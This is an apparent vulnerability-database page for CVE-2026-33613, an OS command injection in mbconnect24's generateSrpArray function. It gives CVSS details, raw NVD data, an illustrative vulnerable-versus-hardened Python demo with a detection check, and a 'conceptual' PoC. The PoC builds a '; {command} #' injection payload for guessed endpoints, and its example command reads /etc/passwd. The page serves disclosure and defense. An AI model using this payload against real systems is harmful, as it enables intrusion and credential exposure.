Security Vulnerability Report
CVE-2026-33613 CVSS 7.2 HIGH

CVE-2026-33613

Published: 2026-04-02 10:16:16
Last Modified: 2026-04-16 15:49:48

Description

Due to improper neutralisation of special elements used in an OS command (CWE-78), a remote attacker can exploit an RCE vulnerability in the generateSrpArray function, resulting in full system compromise. The vulnerability is only exploitable if the attacker already has some other way to write arbitrary data to the user table: the injected shell metacharacters are stored there and reach the OS command when generateSrpArray reads the row.
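To make that data flow concrete, the following is an added illustrative example, not code from mbconnect24 (the real generateSrpArray implementation is not on this page). It builds a constructed in-memory user table, a hypothetical function that interpolates the username column into a shell command the way a CWE-78 bug does, a hardened variant that allowlists the value and passes it as an argv element with no shell, and a defender-side check that flags user rows containing shell metacharacters, which is the precondition the advisory describes. The table layout, the `echo` command standing in for whatever the product really runs, and the allowlist pattern are all assumptions for illustration.

```python
"""Added illustration of the CWE-78 pattern described above: attacker-controlled
text stored in a user table reaches an OS shell. None of this is mbconnect24 code;
the table layout, the command and the allowlist are illustrative assumptions."""
import re
import sqlite3
import subprocess

# Constructed sample rows for a minimal "user" table. Row 3 is the attacker-written
# value the advisory's precondition assumes (some other way to write to the table).
SAMPLE_USERS = [
    (1, "alice"),
    (2, "bob"),
    (3, "mallory; echo INJECTED"),
]

# Characters that change how a POSIX shell parses a command line.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\\\"']")
# Allowlist for a username (assumed policy): fail closed on anything outside it.
SAFE_USERNAME = re.compile(r"[A-Za-z0-9_.@-]{1,64}")


def load_users(rows=SAMPLE_USERS):
    """Build an in-memory SQLite user table from constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT NOT NULL)")
    conn.executemany("INSERT INTO user VALUES (?, ?)", rows)
    return conn


def generate_srp_array_vulnerable(conn):
    """Hypothetical vulnerable shape: the username is interpolated into a shell
    command string, so a stored payload is executed by the shell."""
    outputs = []
    for _row_id, username in conn.execute("SELECT id, username FROM user ORDER BY id"):
        cmd = f"echo user:{username}"  # attacker text becomes part of the shell command
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        outputs.append(result.stdout)
    return outputs


def generate_srp_array_hardened(conn):
    """Hardened shape: validate against the allowlist, then pass the value as a
    separate argv element with shell=False so no shell ever parses it."""
    outputs = []
    for row_id, username in conn.execute("SELECT id, username FROM user ORDER BY id"):
        if not SAFE_USERNAME.fullmatch(username):
            raise ValueError(f"user row {row_id}: username rejected by allowlist: {username!r}")
        result = subprocess.run(["echo", f"user:{username}"], shell=False,
                                capture_output=True, text=True)
        outputs.append(result.stdout)
    return outputs


def find_suspicious_rows(conn):
    """Defender-side check for the precondition: list user rows whose username
    contains shell metacharacters, i.e. rows that may have been tampered with."""
    return [(row_id, username)
            for row_id, username in conn.execute("SELECT id, username FROM user ORDER BY id")
            if SHELL_META.search(username)]


if __name__ == "__main__":
    conn = load_users()
    print("suspicious rows:", find_suspicious_rows(conn))
    print("vulnerable output:", generate_srp_array_vulnerable(conn))
    try:
        print("hardened output:", generate_srp_array_hardened(conn))
    except ValueError as exc:
        print("hardened rejected:", exc)
```

Passing the value as an argv element is what actually removes the injection; the allowlist is a second layer that also turns a tampered row into a logged, fail-closed error rather than silently echoing odd text. The `find_suspicious_rows` query is the kind of check worth running against a real user table before and after patching, since the advisory's precondition is that an attacker already found a way to write to it.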

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

The 7.2 score shown here is the Secondary metric in the NVD record, which rates Privileges Required as High because the attacker must already be able to write to the user table. NVD's Primary metric in the raw JSON below scores the same issue 8.8 HIGH with PR:L (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). Impact is identical in both; the only disagreement is how much privilege the precondition is judged to require, so prioritise on the 8.8 figure if a low-privileged path to the user table exists in your deployment.

Configurations (Affected Products)

cpe:2.3:a:mbconnectline:mbconnect24:*:*:*:*:*:*:*:* - VULNERABLE (versions up to and including 2.19.4)
cpe:2.3:a:mbconnectline:mymbconnect24:*:*:*:*:*:*:*:* - VULNERABLE (versions up to and including 2.19.4)
The description itself does not state affected versions; the version bound comes from the NVD configuration data (versionEndIncluding 2.19.4) in the raw JSON below.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Conceptual Proof of Concept for CVE-2026-33613
# This PoC demonstrates the OS command injection vulnerability.
# The request paths and the 'username' column are placeholders assumed by this
# write-up; the advisory does not name the real endpoints or table columns.
import requests


def exploit(target_url, command):
    # The attacker needs to inject this payload into the user table first.
    # Assuming the vulnerable parameter is 'username' in the user table.
    payload = f"; {command} #"

    # Step 1: Inject payload (assuming an auxiliary vulnerability allows writing to the user table)
    # data = {"username": payload}
    # requests.post(f"{target_url}/api/update_user", data=data)

    # Step 2: Trigger the generateSrpArray function
    # This triggers the OS command execution
    response = requests.get(f"{target_url}/api/generate_srp")
    print(f"Trigger request returned HTTP {response.status_code}")
    print(f"Submitted command: {command}")
    print("Check server response for output or verify shell access.")


# Usage example
# exploit("http://target-ip", "cat /etc/passwd")

References

https://certvde.com/de/advisories/VDE-2026-030 (Third Party Advisory)
https://mbconnectline.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2026-030.json (Vendor Advisory, CSAF)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33613", "sourceIdentifier": "[email protected]", "published": "2026-04-02T10:16:15.727", "lastModified": "2026-04-16T15:49:47.683", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to the improper neutralisation of special elements used in an OS command, a remote attacker can exploit an RCE vulnerability in the generateSrpArray function, resulting in full system compromise.\nThis vulnerability can only be attacked if the attacker has some other way to write arbitrary data to the user table."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mbconnectline:mbconnect24:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.19.4", "matchCriteriaId": "FF88F461-51FB-482C-A406-07F72FC10D79"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mbconnectline:mymbconnect24:*:*:*:*:*:*:*:*", 
"versionEndIncluding": "2.19.4", "matchCriteriaId": "36E8693F-94C4-46A4-BD83-D87B71B89F12"}]}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2026-030", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://mbconnectline.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2026-030.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}